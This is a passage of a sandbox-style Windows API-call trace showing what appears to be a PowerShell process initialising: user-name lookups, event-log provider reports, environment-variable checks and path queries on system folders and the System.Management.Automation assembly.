	[0431.693] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0431.693] CoTaskMemFree (pv=0x1b84a7a0) 
	[0431.693] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.693] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0431.693] CoTaskMemFree (pv=0x4238e0) 
	[0431.694] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x331d550*="FileSystem", lpRawData=0x331d2e0) returned 1
	[0431.694] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.694] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.694] CoTaskMemFree (pv=0x49d6c0) 
	[0431.695] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
	[0431.695] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0431.695] CoTaskMemFree (pv=0x1b84a7a0) 
	[0431.695] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.695] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0431.695] CoTaskMemFree (pv=0x4238e0) 
	[0431.695] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3322d90*="Function", lpRawData=0x3322b20) returned 1
	[0431.696] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.696] CoTaskMemFree (pv=0x49d6c0) 
	[0431.783] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
	[0431.783] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0431.784] CoTaskMemFree (pv=0x1b84a7a0) 
	[0431.784] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.784] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0431.784] CoTaskMemFree (pv=0x4238e0) 
	[0431.784] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3355020*="Registry", lpRawData=0x3354db0) returned 1
	[0431.984] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
	[0431.984] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0431.984] CoTaskMemFree (pv=0x1b84a7a0) 
	[0431.984] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0431.985] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0431.985] CoTaskMemFree (pv=0x4238e0) 
	[0431.985] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x335a438*="Variable", lpRawData=0x335a1c8) returned 1
	[0431.985] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.986] CoTaskMemFree (pv=0x49d6c0) 
	[0431.986] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0431.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0431.986] CoTaskMemFree (pv=0x49d6c0) 
	[0432.001] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
	[0432.001] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d428) returned 0x1
	[0432.002] CoTaskMemFree (pv=0x1b84a7a0) 
	[0432.002] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0432.002] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d468) returned 1
	[0432.002] CoTaskMemFree (pv=0x4238e0) 
	[0432.002] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x336e050*="Certificate", lpRawData=0x336dde0) returned 1
	[0432.003] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.003] CoTaskMemFree (pv=0x49d6c0) 
	[0432.003] GetLogicalDrives () returned 0x4
	[0432.003] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0432.004] CoTaskMemAlloc (cb=0x20e) returned 0x4165e0
	[0432.004] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x4165e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0432.004] CoTaskMemFree (pv=0x4165e0) 
	[0432.004] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.004] CoTaskMemFree (pv=0x49d6c0) 
	[0432.004] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.004] CoTaskMemFree (pv=0x49d6c0) 
	[0432.006] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.006] CoTaskMemFree (pv=0x49d6c0) 
	[0432.006] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.006] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.006] CoTaskMemFree (pv=0x49d6c0) 
	[0432.006] SetErrorMode (uMode=0x1) returned 0x1
	[0432.006] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d070 | out: lpFileInformation=0x24d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0432.006] SetErrorMode (uMode=0x1) returned 0x1
	[0432.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.007] SetErrorMode (uMode=0x1) returned 0x1
	[0432.007] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d070 | out: lpFileInformation=0x24d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0432.007] SetErrorMode (uMode=0x1) returned 0x1
	[0432.007] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.007] CoTaskMemFree (pv=0x49d6c0) 
	[0432.007] SetErrorMode (uMode=0x1) returned 0x1
	[0432.008] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d030 | out: lpFileInformation=0x24d030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0432.008] SetErrorMode (uMode=0x1) returned 0x1
	[0432.008] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0432.008] SetErrorMode (uMode=0x1) returned 0x1
	[0432.008] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d030 | out: lpFileInformation=0x24d030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0432.008] SetErrorMode (uMode=0x1) returned 0x1
	[0432.008] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0432.008] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0432.008] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.008] SetErrorMode (uMode=0x1) returned 0x1
	[0432.009] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d030 | out: lpFileInformation=0x24d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0432.009] SetErrorMode (uMode=0x1) returned 0x1
	[0432.009] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.009] SetErrorMode (uMode=0x1) returned 0x1
	[0432.009] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d030 | out: lpFileInformation=0x24d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0432.009] SetErrorMode (uMode=0x1) returned 0x1
	[0432.009] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.010] SetErrorMode (uMode=0x1) returned 0x1
	[0432.010] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d030 | out: lpFileInformation=0x24d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0432.010] SetErrorMode (uMode=0x1) returned 0x1
	[0432.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.010] SetErrorMode (uMode=0x1) returned 0x1
	[0432.010] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d030 | out: lpFileInformation=0x24d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0432.010] SetErrorMode (uMode=0x1) returned 0x1
	[0432.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.011] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.011] SetErrorMode (uMode=0x1) returned 0x1
	[0432.011] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d070 | out: lpFileInformation=0x24d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0432.011] SetErrorMode (uMode=0x1) returned 0x1
	[0432.011] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.011] SetErrorMode (uMode=0x1) returned 0x1
	[0432.011] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d070 | out: lpFileInformation=0x24d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0432.011] SetErrorMode (uMode=0x1) returned 0x1
	[0432.011] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0432.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.012] SetErrorMode (uMode=0x1) returned 0x1
	[0432.012] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d070 | out: lpFileInformation=0x24d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0432.012] SetErrorMode (uMode=0x1) returned 0x1
	[0432.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.012] SetErrorMode (uMode=0x1) returned 0x1
	[0432.012] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d070 | out: lpFileInformation=0x24d070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0432.012] SetErrorMode (uMode=0x1) returned 0x1
	[0432.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.012] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24cd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0432.013] SetErrorMode (uMode=0x1) returned 0x1
	[0432.013] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d330 | out: lpFileInformation=0x24d330*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0432.013] SetErrorMode (uMode=0x1) returned 0x1
	[0432.021] CoTaskMemAlloc (cb=0x804) returned 0x1b84a7a0
	[0432.021] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b84a7a0, nSize=0x24d698 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d698) returned 0x1
	[0432.154] CoTaskMemFree (pv=0x1b84a7a0) 
	[0432.154] CoTaskMemAlloc (cb=0x204) returned 0x4238e0
	[0432.154] GetUserNameW (in: lpBuffer=0x4238e0, pcbBuffer=0x24d6d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d6d8) returned 1
	[0432.155] CoTaskMemFree (pv=0x4238e0) 
	[0432.155] ReportEventW (hEventLog=0x1b920008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x33a6d38*="Available", lpRawData=0x33a6ac8) returned 1
	[0432.248] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.248] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.248] CoTaskMemFree (pv=0x49d6c0) 
	[0432.248] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.249] CoTaskMemFree (pv=0x49d6c0) 
	[0432.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.251] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.251] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0432.251] CoTaskMemFree (pv=0x49d6c0) 
	[0432.251] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.251] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0432.251] CoTaskMemFree (pv=0x49d6c0) 
	[0432.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.252] GetCurrentProcessId () returned 0x8e8
	[0432.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
